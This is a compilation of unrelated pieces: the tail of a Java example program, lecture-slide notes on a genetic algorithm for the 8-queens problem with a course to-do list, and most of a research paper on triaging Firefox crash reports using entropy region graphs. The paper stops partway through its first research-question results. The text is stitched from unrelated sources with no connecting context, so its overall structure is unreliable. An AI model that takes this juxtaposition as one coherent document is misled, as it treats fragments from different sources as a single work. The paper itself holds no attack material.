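            if (c <= 100) within++;
        }
        return 100.0 * within / counts.size();
    }

    public static void main(String[] args) {
        List<Integer> counts = List.of(80, 95, 120, 60, 200);
        System.out.println(calculateAverage(counts)); // 111.0
        System.out.println(calculatePercent(counts)); // 60.0
    }
}
```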
Representation of Chess Board
5th row, 8th position
8th position = index 7
Genetic Algorithm
Size = 4
Fitness of the first individual? The fitness function adds +1 for each queen for each clash it is involved in.
Genetic Algorithm
Generate new population:
- Sort by fitness value
- Take upper half
- Then generate new board allocations based on allocation pairs in the upper half
Size = 4
Genetic Algorithm
Generate new population:
Size = 4
[1, 5, 7, 2, 1, 2, 4, 6]
[3, 4, 0, 7, 6, 1, 7, 2]
[3, 5, 0, 2, 1, 1, 7, 6]
[1, 4, 7, 7, 6, 2, 4, 2]
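The clash-based fitness hinted at above can be sketched as follows, assuming the common encoding of one queen per column with the array value giving its row (the slides' index-0-to-7 representation). The scoring convention of +1 per queen per clash (so each clashing pair counts twice) follows the slide; the class and method names are illustrative.

```java
public class QueensFitness {
    // Board: index = column, value = row of the queen in that column (0-7).
    // For each queen, count how many other queens attack it
    // (same row or same diagonal); +1 per queen per clash.
    static int clashes(int[] board) {
        int clashes = 0;
        for (int i = 0; i < board.length; i++) {
            for (int j = 0; j < board.length; j++) {
                if (i == j) continue;
                boolean sameRow = board[i] == board[j];
                boolean sameDiagonal =
                    Math.abs(board[i] - board[j]) == Math.abs(i - j);
                if (sameRow || sameDiagonal) clashes++;
            }
        }
        return clashes;
    }

    public static void main(String[] args) {
        // A known solution of the 8-queens problem: zero clashes.
        System.out.println(clashes(new int[]{0, 4, 7, 5, 2, 6, 1, 3})); // 0
        // All queens on one diagonal: every queen clashes with all 7 others.
        System.out.println(clashes(new int[]{0, 1, 2, 3, 4, 5, 6, 7})); // 56
    }
}
```

A genetic algorithm would then minimize this clash count (or maximize its negation) until a zero-clash board is found.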
To Do & Next Week
• Quiz 1 (in Moodle!):
– Opens tomorrow morning – closes on Monday before noon!
• Lab 1:
– Debugging
• Lecture 2:
– Basic Black-Box and White-Box Testing Techniques (intro)
Next Week! Tue/Wed
An Entropy Evaluation Approach for Triaging Field Crashes: A Case Study of Mozilla Firefox
Foutse Khomh\textsuperscript{1}, Brian Chan\textsuperscript{1}, Ying Zou\textsuperscript{1}, Ahmed E. Hassan\textsuperscript{2}
\textsuperscript{1} Dept. of Elec. and Comp. Engineering, Queen’s University, Kingston, Ontario, Canada
\textsuperscript{2} School of Computing, Queen’s University, Kingston, Ontario, Canada
E-mail: \{foutse.khomh, 2byc, ying.zou\}@queensu.ca, ahmed@cs.queensu.ca
\textit{Abstract}—A crash is an unexpected termination of an application during normal execution. Crash reports record stack traces and run-time information once a crash occurs. A group of similar crash reports represents a crash-type. The triaging of crash-types is critical to shortening the development and maintenance process. The crash triaging process decides the priority of crash-types to be fixed. The decision typically depends on many factors, such as the impact of the crash-type \textit{(i.e., its severity)}, its frequency of occurrence, and the effort required to implement a fix for the crash-type. In this paper, we propose the use of entropy region graphs to triage crash-types. An entropy region graph captures the distribution of the occurrences of crash-types among the users of a system. We conduct an empirical study on crash reports and bugs collected from 10 beta releases of Firefox 4. We show that our proposed triaging technique enables a better classification of crash-types than the current triaging used by Firefox teams. Developers and managers could use such a technique to prioritize crash-types during triage, to estimate developer workloads, and to decide which crash-type patches should be included in the next release.
\textit{Keywords}—Crash, bug, triaging, entropy region graphs.
I. INTRODUCTION
Software testing is the most widely used approach to detect bugs in software systems. It plays a central role in ensuring the quality and the success of a system. Nowadays, it is common to have built-in automatic crash reporting tools in software systems to collect crash reports directly from an end user’s machine. The Windows OS, Internet Explorer, and Mozilla Firefox are a few examples of systems that make use of automatic collection of field crash reports. For example, whenever Firefox closes unexpectedly, Mozilla Crash Reporter collects information about the event and sends a detailed crash report to the Socorro crash report server. The collected crash reports include a stack trace of the failing thread and other information about the user’s environment to help developers replicate and fix the crash. A group of similar crash reports represents a crash-type. However, the built-in automatic crash reporting tools often collect a huge number of crash reports. For example, Firefox receives 2.5 million crash reports every day [1]. Triaging the collected crash-types is essential to allow developers and maintainers to focus their efforts more efficiently. During the triaging of crash-types, decisions are made about which crash-types should be fixed and when. These decisions typically depend on many factors, such as the impact of the crash-type \textit{(i.e., its severity)}, the crash-type frequency, the effort required to implement a fix for the crash-type, and the risk of attempting to fix the crash-type. Currently, Firefox developers triage crash-types based on the daily frequency of occurrence of a crash-type. For the top crash-types \textit{(i.e., the crash-types with the largest numbers of crash reports)}, Firefox developers file bugs in Bugzilla and link them to the corresponding crash-type in the Socorro server. Multiple bugs can be filed for a single crash-type and multiple crash-types can be associated with the same bug.
The severity and priority of bugs are assigned manually by Mozilla triage teams, and are often modified later during the fixing process. Because bug classification depends on the personal judgment of triage team members, it is a subjective process and often results in resources being spent on non-essential issues [2]. Moreover, little estimation is provided to developers about the effort required to fix the crash-types and the risk of their attempts to fix the crash-types.
In this paper, we propose the use of crash entropy values to prioritize crash-types to fix during the triaging. More specifically, we propose the use of both entropy and frequency information during the triaging of a crash-type. The entropy of a crash-type quantifies the distribution of the occurrence of the crash-type among the users of the system. A high entropy value for a crash-type means that most users encountered that crash-type. The priority of such a crash-type should be raised by developers and quality managers. Currently, most triage teams sort crash-types based on frequency values, but do not consider the distribution of the crash-types among users. For example, Firefox triage teams give equal importance to the \textit{Taskbar tab preview} crash-type \textit{(i.e., \texttt{mozilla::widget::WindowHook::Lookup(unsigned int)})} and the \textit{hang} crash-type \textit{(i.e., \texttt{hang | mozilla::plugins::PPluginInstanceParent::CallNPP::destroy(short*)})}, which have frequency values of 17,485 and 17,417 respectively. Yet the impact of the two crash-types on the users is very different, since the \textit{Taskbar tab preview} crash-type affected only 7% of users
while 21% of users experienced the hang crash-type. A good triaging should assign different levels of importance to the two crash-types. The use of frequency alone is not enough to show the full impact of a crash-type on the users of a system. Moreover, although Firefox triage teams assigned the same level of priority to the two crash-types, it took them 10,464 hours to fix the Taskbar tab preview crash-type compared to only 1,152 hours for the hang crash-type. This large difference in fixing time could be explained by the fact that, because few users experienced the Taskbar tab preview crash-type, only limited information was available for developers to replicate and test the correction. We believe that the information on the entropy of the two crash-types would have enabled a better triaging of the crash-types and a better assessment of the efforts needed to fix the crash-types.
In this paper, we propose a triaging technique based on the frequency and the entropy of crash-types. We conduct an empirical study on crash reports and bugs, collected from 10 beta releases of Firefox 4, and show that the new proposed triaging technique enables a better classification of crash-types than the current technique used by Firefox teams.
The rest of the paper is organized as follows. Section II describes the Mozilla crash triaging system, introduces the concept of crash-type entropy, and presents the proposed entropy based crash-type triaging approach. Section III describes the design of our case study and reports its results. Section IV discusses threats to the validity of our study. Section V discusses the related literature on triaging and entropy based analysis. Finally, Section VI concludes the paper and outlines future work.
II. CRASH-TYPE AND ENTROPY
A. Mozilla Crash Triaging System
Firefox is delivered with a built-in crash reporting tool: Mozilla Crash Reporter. Whenever Firefox closes unexpectedly, Mozilla Crash Reporter collects information about the event and sends a detailed crash report to the Socorro crash report server. The crash reports include a stack trace of the failing thread and other information about the user’s environment. A stack trace is an ordered set of frames. Each frame refers to a method signature and provides a link to the corresponding source code. Source code information is not always available in the frames; especially when a frame belongs to a third party binary. Figure 1 illustrates a sample crash report for Firefox.
Crash reports are sent to the Socorro crash report server [1]. The Socorro server assigns a unique id to each received report and groups the similar crash reports together. A group of similar crash reports is termed as a crash-type. The crash reports are grouped based on the top method signature of the stack trace. However, subsequent frames in the stack traces can vary for different crash reports in a crash-type. Figure 2 illustrates a sample crash-type. For each crash-type, the Socorro server provides a crash-type summary, a list of crash reports grouped under the crash-type and a set of bugs filed for the crash-type. Figure 2 shows the structure of the crash-type “UserCallWinProCheckWow” on the Socorro server.
The Socorro server provides a rich web interface for developers to analyze crash-types. Developers triage the crash-types by prioritizing the top crash-types (i.e., the crash-types with the maximum number of crash reports) to analyze and fix the bugs responsible for the crashes.
Mozilla uses Bugzilla for tracking bugs and maintains a bug report for each filed bug. For the most frequent crash-types (i.e., the crash-types with the maximum numbers of crash reports), Firefox developers file new bugs in Bugzilla and link them to the corresponding crash-type in the Socorro server. Multiple bugs are sometimes linked to a single crash-type, and multiple crash-types can also link to the same bug. The Socorro server and Bugzilla are integrated, so developers can directly navigate to the linked bugs from a crash-type summary in the Socorro server. Figure 3 presents a bird's-eye view of the Firefox crash triaging system.
Mozilla quality assurance teams triage bug reports and assign severity levels to the bugs [3]. When a developer fixes a bug, he or she often submits a patch to Bugzilla. A patch includes source code changes, test code, and other configuration file changes. Once approved, the patch code is integrated into the source code of the system.
B. Entropy of a Crash-type
In this study we apply the normalized Shannon’s entropy measure [4] to crash-types. We aim at capturing the distribution of a crash-type among the users of a system. We compute the entropy of a crash-type following Equation (1):
$$H_n(CT) = -\sum_{i=1}^{n} p_i \times \log_n(p_i)$$ \hspace{1cm} (1)
Where $CT$ is a crash-type; $p_i$ is the probability of a specific user $i$ reporting $CT$ ($p_i \geq 0$, and $\sum_{i=1}^{n} p_i = 1$); and $n$ is the total number of unique users of the system.
For a crash-type $CT$ where all the users have the same probability of reporting $CT$ (i.e., $p_i = \frac{1}{n}$, $\forall i \in 1, 2, \ldots, n$), the entropy is maximal (i.e., 1). On the other hand, if a crash-type $CT$ is reported by only one user $i$, the entropy of $CT$ is minimal (i.e., 0). Crash-types with high entropy values are reported by more users; such crash-types are therefore likely to be easier to replicate than crash-types with low entropy values. A low entropy value indicates a strong propensity for a certain subset of users to report the crash-type, while other users rarely do so. Crash-types with low entropy values may indicate that the anomaly lies on the side of specific users and not in the software system. Entropy values of crash-types could help developers and quality assurance teams identify problems with a higher negative impact on users. The entropy of crash-types can also help developers identify crash-types that need better coverage, i.e., crash-types for which the recruitment of more users with a specific profile is needed to help developers replicate and fix the associated bugs.
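As an illustration (our own sketch, not part of Mozilla's tooling), Equation (1) can be computed directly from per-user report counts; the function and variable names below are ours:

```python
import math

def normalized_entropy(report_counts, n_users):
    """Normalized Shannon entropy (Equation 1) of a crash-type.

    report_counts: number of crash reports submitted by each reporting user.
    n_users: total number of unique users of the system (the logarithm base n).
    """
    total = sum(report_counts)
    h = sum((c / total) * math.log(c / total, n_users)
            for c in report_counts if c > 0)
    return -h if h else 0.0  # avoid returning -0.0 for a single reporter

# Boundary cases from the text: uniform reporting across all users gives
# the maximal entropy 1; a single reporting user gives the minimal entropy 0.
print(round(normalized_entropy([1] * 100, 100), 6))  # -> 1.0
print(round(normalized_entropy([42], 100), 6))       # -> 0.0
```
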
C. Entropy Analysis
We propose an entropy graph that can be used to triage crash-types. The entropy of a crash-type shows the distribution of the occurrences of the crash-type among a set of users. However, the entropy of a crash-type alone does not capture the magnitude of its occurrence. We propose to combine the entropy and the frequency values to better capture the overall effect of a crash-type on the users of a system. For example, suppose crash-type $CT_1$ was reported by 3 users out of a group of 100: A (40 crash reports), B (100 crash reports), and C (60 crash reports), for 200 reports in total. Crash-type $CT_2$ was reported by all 100 users, with 2 reports each, and hence also has 200 reports. We define the probability distribution of a crash-type reported by users as the probability that a user $i$ reports the crash-type: for each user, we count the total number of crash reports of the crash-type reported by the user and divide it by the total number of crash reports of the crash-type reported by all the users. Hence, for our example, the probability of $UserA$ is $p(\text{User}A) = \frac{40}{200} = 0.2$. Similarly, the probabilities of $UserB$ and $UserC$ are $p(\text{User}B) = \frac{100}{200} = 0.5$ and $p(\text{User}C) = \frac{60}{200} = 0.3$, respectively. The normalized Shannon entropy of $CT_1$ is 0.22. Since all 100 users reported an equal number of reports for $CT_2$, the normalized Shannon entropy of $CT_2$ is 1. Although the frequencies of $CT_1$ and $CT_2$ are equal, their entropy values are very different. We propose to categorize the crash-types of systems by the level of their entropy values (i.e., above a certain threshold), as well as the total frequency of their occurrence. Because the number of reported crash-types can be large, we propose to visualize all crash-types as points according to their entropy value and frequency value on a region graph, as shown in Figure 4.
This makes it easier to see the general disposition of crash-types among all the users of a system. More specifically, each point on the graph represents a crash-type characterized by its entropy and frequency values. The $x$-axis represents the normalized frequency of crash-types. We compute the normalized frequency of a crash-type by dividing its frequency by the frequency of the most reported crash-type. The $y$-axis represents the entropy distribution of the crash-types. The maximum value on both axes is 1. As the frequency and entropy values increase across both axes, the probability that the crash-type covers a larger population of users increases.
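The entropy values of the worked example above ($CT_1$ and $CT_2$) can be checked numerically; the following self-contained sketch is our own illustrative code:

```python
import math

def normalized_entropy(report_counts, n_users):
    # Normalized Shannon entropy (Equation 1), logarithm base n_users.
    total = sum(report_counts)
    h = sum((c / total) * math.log(c / total, n_users)
            for c in report_counts if c > 0)
    return -h if h else 0.0

# CT1: users A, B and C report 40, 100 and 60 of the 200 reports (100 users total).
ct1 = normalized_entropy([40, 100, 60], 100)
print(round(ct1, 2))  # -> 0.22, as in the text

# CT2: all 100 users report 2 crashes each; the distribution is uniform.
ct2 = normalized_entropy([2] * 100, 100)
print(round(ct2, 2))  # -> 1.0
```
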
### Table I
**SUMMARY OF ENTROPY REGIONS**
<table>
<thead>
<tr>
<th>Region</th>
<th>Entropy</th>
<th>Frequency</th>
<th>Priority</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>Highly Distributed</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>The crash-type is reported with high frequency and is well distributed among users, indicating that more users can report it consistently. More information on failing stack traces is available, and developers will be able to replicate the crash easily by selecting users from the testing base.</td>
</tr>
<tr>
<td>Skewed</td>
<td>Low</td>
<td>High</td>
<td>Medium</td>
<td>The crash-type is reported frequently; however, the distribution is skewed towards certain users. The diversity of the reported stack traces is low. Developers may have to rely on certain beta users to replicate the crash.</td>
</tr>
<tr>
<td>Moderately Distributed</td>
<td>High</td>
<td>Low</td>
<td>Low</td>
<td>The crash-type is only reported by a selected number of users, but they report it evenly. This indicates a specific user cluster that developers have to recruit from in order to replicate the crash.</td>
</tr>
<tr>
<td>Isolated</td>
<td>Low</td>
<td>Low</td>
<td>Very Low</td>
<td>This configuration is the least desirable from the developers' point of view. The crash-type is obscure and hard to replicate on any system. Very little information is provided on failing stack traces. Developers will have the hardest time resolving this crash.</td>
</tr>
</tbody>
</table>

**Figure 4.** Entropy distribution graph regions
### D. Crash-type Triaging
Having all the points on the graph can tell if a system is prone to isolated users reporting infrequent crash-types or whether it contains crash-types reported by the majority of users. We propose to divide the entropy graph into regions with different priorities, as illustrated by Figure 4. Table I summarizes the possible regions in which a crash-type can land and their different characteristics. The boundaries of the illustrated regions vary based on the context and maturity of systems. Developers and quality managers can make use of historical data from the field testing of previous versions of their systems to compute optimal boundaries. In this work, we use the medians of the frequency and entropy values to identify the boundaries illustrated in Figure 4.
The triaging of crash-types is a process that typically depends on factors such as the severity of crash-types, the frequency of crash-types, and the effort required to fix the crash-type. Crash-types are sometimes purposely left unfixed for some of the following reasons: the crash-type occurs rarely and affects only a few users, or the effort required to fix the crash-type is large and expensive. Often, some crash-types are left unfixed because of the risk in attempting to fix them. Sliwerski et al. [5] observed that code changes that fix bugs in systems are up to two times more likely to introduce new bugs than other kinds of changes. An effective triaging of crash-types should allow developers to focus their time and effort on crashes that they are actually able to fix.
Taking into account the aforementioned triaging criteria, we make the following recommendations for the triage of crash-types using an entropy graph:
- **Highly Distributed Region:** crash-types with high frequency and entropy values (i.e., values above the median threshold) should be given a “high” priority.
- **Skewed Region:** a crash-type with a high frequency value but a low entropy, should be given a “medium” priority since it means that the crash-type only seriously affects a small proportion of users and is more likely to be specific to the user’s systems.
- **Moderately Distributed Region:** conversely, a crash-type with a high entropy value but low frequency means that it is well distributed among the users that report it, but does not occur very often to the majority of users and therefore should be given a “low” priority.
- **Isolated Region:** crash-types with low frequency and low entropy values should be given a “very low” priority since they are very rare and affect only a small number of users.
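Under the median-threshold boundaries described in Section II-D, the region assignment amounts to two comparisons. The sketch below is our own illustrative code (function and variable names are ours):

```python
from statistics import median

def region_and_priority(entropy, freq, entropies, freqs):
    """Assign a crash-type to an entropy-graph region and a triage priority.

    entropy, freq: the crash-type's entropy and normalized frequency.
    entropies, freqs: values for all crash-types, used to derive the
    median thresholds as described in the text.
    """
    high_e = entropy > median(entropies)
    high_f = freq > median(freqs)
    if high_f:
        return ("Highly Distributed", "high") if high_e else ("Skewed", "medium")
    return ("Moderately Distributed", "low") if high_e else ("Isolated", "very low")

all_e, all_f = [0.1, 0.4, 0.7, 0.9], [0.05, 0.2, 0.6, 1.0]
print(region_and_priority(0.9, 1.0, all_e, all_f))  # -> ('Highly Distributed', 'high')
print(region_and_priority(0.1, 0.6, all_e, all_f))  # -> ('Skewed', 'medium')
```
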
If additional information on the user perception of a crash-type is available, the priority of crash-types with low entropy values that are considered “critical”, “major”, or “blocker” should be raised to “high”. Developers should start fixing them as early as possible since they are likely to be hard to fix. This is due to the limited information provided by their failing threads and the difficulty of their replication.
Entropy graphs could also be used to assess the reliability of a population of testers. For example, if a system has most of its crash-types in the Skewed region, the population of testers in general can be considered fairly reliable, since not every tester reports the same issues. If the majority of crash-types is in the Isolated region, the testing population as a whole would be of little use: testers report only a very limited number of bugs, and it may not be critical to investigate them.
III. Case Study
The goal of this case study is to assess the usefulness of entropy region graphs in triaging crash-types. The motivation is the improvement and automation of existing approaches for prioritizing crash-types. Developers and quality assurance teams could make use of entropy region graphs to automate the prioritization of their systems' crash-types and reduce triaging time and effort. Quality managers could also use entropy region graphs to better plan the testing activities of their systems and allocate support resources to reduce servicing costs.
### Table II
**DESCRIPTIVE STATISTICS OF OUR DATA SET**
<table>
<thead>
<tr>
<th>version</th>
<th>release date</th>
<th>number of crash reports</th>
<th>median uptime (sec)</th>
<th>average crash/day</th>
</tr>
</thead>
<tbody>
<tr>
<td>4.0b1</td>
<td>6-Jul-10</td>
<td>608,912</td>
<td>388</td>
<td>28,996</td>
</tr>
<tr>
<td>4.0b2</td>
<td>27-Jul-10</td>
<td>350,387</td>
<td>321</td>
<td>23,359</td>
</tr>
<tr>
<td>4.0b3</td>
<td>11-Aug-10</td>
<td>348,531</td>
<td>373</td>
<td>26,810</td>
</tr>
<tr>
<td>4.0b4</td>
<td>24-Aug-10</td>
<td>530,624</td>
<td>427</td>
<td>37,902</td>
</tr>
<tr>
<td>4.0b5</td>
<td>7-Sep-10</td>
<td>455,091</td>
<td>52</td>
<td>65,013</td>
</tr>
<tr>
<td>4.0b6</td>
<td>14-Sep-10</td>
<td>1,698,163</td>
<td>935</td>
<td>29,803</td>
</tr>
<tr>
<td>4.0b7</td>
<td>29-Sep-10</td>
<td>1,848,218</td>
<td>686</td>
<td>44,999</td>
</tr>
<tr>
<td>4.0b8</td>
<td>22-Dec-10</td>
<td>871,034</td>
<td>544</td>
<td>37,872</td>
</tr>
<tr>
<td>4.0b9</td>
<td>14-Jan-11</td>
<td>608,949</td>
<td>572</td>
<td>55,359</td>
</tr>
<tr>
<td>4.0b10</td>
<td>25-Jan-11</td>
<td>529,195</td>
<td>716</td>
<td>47,028</td>
</tr>
</tbody>
</table>
The context of this study consists of data derived from the field testing of ten beta releases of Firefox, ranging from Firefox-4.0b1 to Firefox-4.0b10. Firefox is a free and open source web browser from the Mozilla Application Suite, managed by the Mozilla Corporation. As of March 2011, Firefox is the second most widely used browser in the world, with approximately 30% of the usage share of web browsers [6]. Firefox runs on various operating systems including Microsoft Windows, GNU/Linux, Mac OS X, FreeBSD, and many other platforms. For each beta release, we downloaded all the reported crash-types and their associated bug reports from the Socorro server and Bugzilla. Table II reports the descriptive statistics of our data set. The uptime in Table II is the duration in seconds for which Firefox was running before it crashed.
In the following subsections, we describe the data collection for our study. We present our research questions, and describe our analysis method. Then we present and discuss the results of our study.
A. Data Collection
When Firefox crashes on a user’s machine, the Mozilla Crash Reporter collects information about the event and sends a detailed crash report to the Socorro server [1].
A crash report includes the stack trace of the failing thread and other information about a user environment, such as operating system, Firefox version, install time, and a list of plug-ins installed. The Socorro server groups crash reports based on the top method signature of a stack trace to create a crash-type. Developers file bugs in Bugzilla and link them to the corresponding crash-types in Socorro server. A bug report contains detailed information about a bug, such as the bug open date, the last modification date, the bug severity, and the bug status. We mine the Socorro server to identify users reporting crash-types. We also mine Bugzilla repository to identify bug fix information. For each crash-type and its associated bugs, we compute several metrics to assess the effort needed to fix the crash-type. In the following, we discuss the details of each of these steps.
Identification of Users. Crash reports in the Socorro server do not contain personal information to identify unique users reporting the crashes due to privacy concerns. To identify users reporting crashes, we have to use heuristics. We parse the downloaded crash reports and extract the following available information on the crash events:
- the install age (in seconds) since the installation or the last update of the user’s system;
- the date at which the crash was processed on the server;
- the client crash date, i.e., the time on the user’s system when the crash occurred (this value can shift around with clock resets);
- the uptime (in seconds) since the user’s system was launched;
- the last crash of the user.
Other user’s environment information provided in crash reports includes: product, version, build, development branch, operating system name, operating system version, architecture (e.g., x86) + CPU family model and stepping, user comments, addons checked, flash version, and app notes (i.e., graphics card vendor id and device id).
For each crash report, we subtract the “install age” from the crash time to identify the point in time when the user reporting the crash installed Firefox. We combine the user installation time with the information available on the user's environment and the last crash times from the crash reports to build a vector of unique profiles, each profile representing a user.
Identifying unique users reporting crash-types is important to compute the entropy of a crash-type. We associate each unique profile with the list of crash-types for which crash reports contain information corresponding to the profile.
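A sketch of this profile-building heuristic is given below; the code and its dict field names are ours and purely illustrative (actual Socorro crash reports use their own schema):

```python
from datetime import datetime, timedelta

def profile_key(report):
    """Build a profile key approximating a unique user.

    Install time = client crash date minus install age; this is combined
    with environment fields available in the crash report.
    """
    crash_date = datetime.fromisoformat(report["client_crash_date"])
    install_time = crash_date - timedelta(seconds=report["install_age"])
    return (
        install_time.isoformat(),
        report["os_name"],
        report["os_version"],
        report["architecture"],
        report["last_crash"],
    )

# Two reports with the same environment and derived install time map to
# one profile, even though their crash dates differ.
r1 = {"client_crash_date": "2010-09-14T10:00:00", "install_age": 3600,
      "os_name": "Windows NT", "os_version": "6.1", "architecture": "x86",
      "last_crash": 120}
r2 = dict(r1, client_crash_date="2010-09-14T12:00:00", install_age=10800)
print(profile_key(r1) == profile_key(r2))  # -> True
```
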
Metrics Extraction. For all the bugs filed for all the crash-types from our 10 beta releases of Firefox 4 on the Socorro server, we retrieve bug reports from Bugzilla. Overall, 1,329 crash-types in our data set are linked to at least one bug. The total number of bugs is 1,733: 519 bugs are fixed, 253 bugs are duplicates of fixed bugs, and 961 bugs are left unfixed. We parse each of the bug reports to extract information about the bug open and modification dates. We compute the duration of the fixing period for each fixed bug (i.e., the difference between the bug open time and the last modification time). We compute the number of comments for each bug. The
number of comments in a bug report reflects the level of discussion between developers about the bug. It has been used in previous studies [2] to measure developers' effort to fix a bug. We extract additional information on the severity, priority, and status of bugs that is provided by Mozilla quality teams and is available in bug reports. We use the extracted priorities to compare our proposed triaging technique to the existing prioritization approach of Mozilla quality teams. For each crash-type whose associated bugs have status “FIXED” or “CLOSED,” we compute the duration of the fixing period of the crash-type as the difference between the earliest open time of its associated bugs and the latest modification time of those bugs. We sum the numbers of comments of the associated bugs to compute the effort needed to fix the crash-type. We also count the number of bugs linked to the crash-type to assess the complexity of the crash-type.
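The crash-type metrics described above can be sketched as follows (our own illustrative code; the dict fields are hypothetical, with times given in seconds):

```python
def crash_type_metrics(bugs):
    """Fixing duration, total comments and bug count for one crash-type.

    Duration (in hours) = latest modification time of the fixed/closed
    associated bugs minus their earliest open time, as described in the text.
    """
    fixed = [b for b in bugs if b["status"] in ("FIXED", "CLOSED")]
    earliest_open = min(b["open_time"] for b in fixed)
    latest_mod = max(b["modified_time"] for b in fixed)
    return {
        "fix_duration_h": (latest_mod - earliest_open) / 3600,
        "comments": sum(b["comments"] for b in fixed),
        "n_bugs": len(bugs),
    }

# Hypothetical crash-type with two associated bugs.
bugs = [
    {"status": "FIXED", "open_time": 0, "modified_time": 7200, "comments": 5},
    {"status": "CLOSED", "open_time": 3600, "modified_time": 36000, "comments": 12},
]
m = crash_type_metrics(bugs)
print(m)  # -> {'fix_duration_h': 10.0, 'comments': 17, 'n_bugs': 2}
```
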
B. Research Questions
To assess the benefits of entropy region graphs for crash-types triaging, we aim at answering the following research questions:
1) **RQ1**: Can an analysis of the distribution of crash-types entropy help classify crash-types by the level of difficulty?
2) **RQ2**: Do crash-types belonging to different regions of an entropy graph possess different characteristics?
3) **RQ3**: Do entropy graphs help improve the triaging of crash-types?
C. Analysis Method
**RQ1.** We study whether an analysis of the distribution of crash-types entropy values could help classify the crash-types. This question is preliminary and aimed at providing quantitative evidence to support the intuition behind our study that the entropy of crash-types affects the difficulty of fixing them. To assess the difficulty of fixing a crash-type, we use the number of bugs associated with the crash-type, the duration of the fixing period of the crash-type, as well as the number of comments exchanged by developers about the crash-type. These metrics have been used in previous studies on bug fixing [2].
We answer this research question in three steps: first, we investigate if crash-types with more bugs mapped to them have significantly different entropy values compared to crash-types that are associated with a single bug. We test the following null hypothesis:
\( H_{01}^{\text{RQ1}} : \text{the distribution of entropy values is the same for crash-types associated with many bugs and crash-types associated with a single bug.} \)
Second, we compare the duration of the fixing period of crash-types with high entropy values to the duration of the fixing period of crash-types that have low entropy values. We test the following null hypothesis:
\( H_{02}^{\text{RQ1}} : \text{the distribution of the duration of a crash-type fixing period is the same for crash-types with high entropy values and crash-types that have low entropy values.} \)
We use the median to decide on high and low entropy values. Third, we compare the number of comments exchanged by developers about crash-types with high entropy values to the number of comments for crash-types that have low entropy values. We test the following null hypothesis:
\( H_{03}^{\text{RQ1}} : \text{the distribution of the number of comments exchanged about a crash-type is the same for crash-types with high entropy values and crash-types that have low entropy values.} \)
**RQ2.** We want to understand to what extent the different regions of an entropy graph are able to discriminate crash-types with different characteristics. Similar to **RQ1**, we use the duration of the fixing period of a crash-type and the number of comments exchanged by developers about the crash-type to characterize the crash-type. We use the Kruskal-Wallis rank sum test to investigate if the distributions of the durations of crash-types fixing periods and of the numbers of comments exchanged about crash-types are the same across the regions of the entropy graph. The Kruskal-Wallis rank sum test is a non-parametric statistical test used for testing the equality of the population medians among different groups. It is an extension of the Wilcoxon rank sum test to 3 or more groups. We therefore test the following two null hypotheses:
\( H_{01}^{\text{RQ2}} : \text{the distribution of the duration of a crash-type fixing period is the same for all crash-types across the regions of the entropy graph.} \)
\( H_{02}^{\text{RQ2}} : \text{the distribution of the number of comments exchanged about a crash-type is the same for all crash-types across the regions of the entropy graph.} \)
**RQ3.** The third research question evaluates the entropy based crash-type triaging approach presented in Section II-D. We extract severity and priority information from bug reports associated with crash-types from our data set. A preliminary analysis of bug reports revealed that the priority field is rarely used by the Mozilla quality team: only 7% of bug reports contain a priority value. Therefore, when the priority field is empty, we rely solely on severity values to recover the priority of crash-types. We use the following rules to estimate the priority of crash-types based on the severity levels of their associated bugs:
- We consider a crash-type to be of high priority if at least one of its associated bugs has a severity level of either “critical”, “major”, or “blocker”.
- When the highest severity level of the associated bugs is “normal”, we consider the priority of the crash-type to be “medium”.
- When the highest severity level of the associated bugs is “trivial”, we consider the priority of the crash-type to be “very low”.
- Otherwise the priority of the crash-type is considered “low”.
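These rules can be expressed as a small sketch (our own code; the severity ordering beyond the levels named above follows the usual Bugzilla convention and is our assumption):

```python
# Most to least severe; the "minor" level is assumed beyond the text's levels.
SEVERITY_ORDER = ["blocker", "critical", "major", "normal", "minor", "trivial"]

def crash_type_priority(bug_severities):
    """Estimate a crash-type's priority from its bugs' severity levels."""
    highest = min(bug_severities, key=SEVERITY_ORDER.index)  # most severe
    if highest in ("blocker", "critical", "major"):
        return "high"
    if highest == "normal":
        return "medium"
    if highest == "trivial":
        return "very low"
    return "low"  # e.g., the highest severity level is "minor"

print(crash_type_priority(["normal", "critical"]))  # -> high
print(crash_type_priority(["trivial", "trivial"]))  # -> very low
```
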
We compute the similarity between the priority levels assigned by our entropy based crash-type triaging approach and the priority levels of crash-types obtained from bug reports following Equation (2).
\[
\text{Similarity}(C) = \frac{N_T}{N} \tag{2}
\]
where \(C\) is a set of crash-types; \(N_T\) is the number of crash-types in \(C\) for which the priority level assigned by the entropy based triaging approach is the same as the priority extracted from bug reports; and \(N\) is the total number of crash-types in \(C\).
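Equation (2) amounts to the following (our own illustrative sketch; the priority lists are hypothetical):

```python
def similarity(entropy_priorities, report_priorities):
    """Equation (2): fraction of crash-types whose entropy-based priority
    matches the priority recovered from bug reports."""
    matches = sum(e == r for e, r in zip(entropy_priorities, report_priorities))
    return matches / len(entropy_priorities)

# Two of three hypothetical crash-types agree on priority.
print(round(similarity(["high", "medium", "low"],
                       ["high", "medium", "very low"]), 2))  # -> 0.67
```
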
We use the status of bugs associated to crash-types (examples of status include FIXED, INVALID or WORKS-FOR-ME) and the durations of crash-types fixing period to further assess the benefits of our proposed triaging approach.
**RQ1: Can an analysis of the distribution of crash-types entropy help classify crash-types by the level of difficulty?**
In this research question, we are interested in assessing the relevance of entropy analysis of crash-types to identify the difficulty levels of crash-types. To test our first null hypothesis, we organize crash-types in two groups: the group of crash-types associated with a single bug and the group of crash-types associated with multiple bugs. We compute the entropy value of each crash-type from the two groups following Equation (1). Results show that, on average, the entropy value of a crash-type associated with multiple bugs is twice the entropy value of a crash-type with a single bug. We perform a Wilcoxon rank sum test to verify the statistical significance of this difference and obtain a \(p\)-value of 2.039e-08. Therefore, we reject \(H_{01}^{\text{RQ1}}\). Crash-types linked to multiple bugs affect more users than crash-types linked to a single bug.
To test our second and third null hypothesis, we group fixed crash-types by the level of their entropy values. We use the median of entropy values as our threshold to build two groups: a group of crash-types with high entropy values and a group of crash-types with low entropy values. The entropy value of a crash-type is considered high if it is greater than the median of the entropy values of all the crash-types. Otherwise, it is considered low.
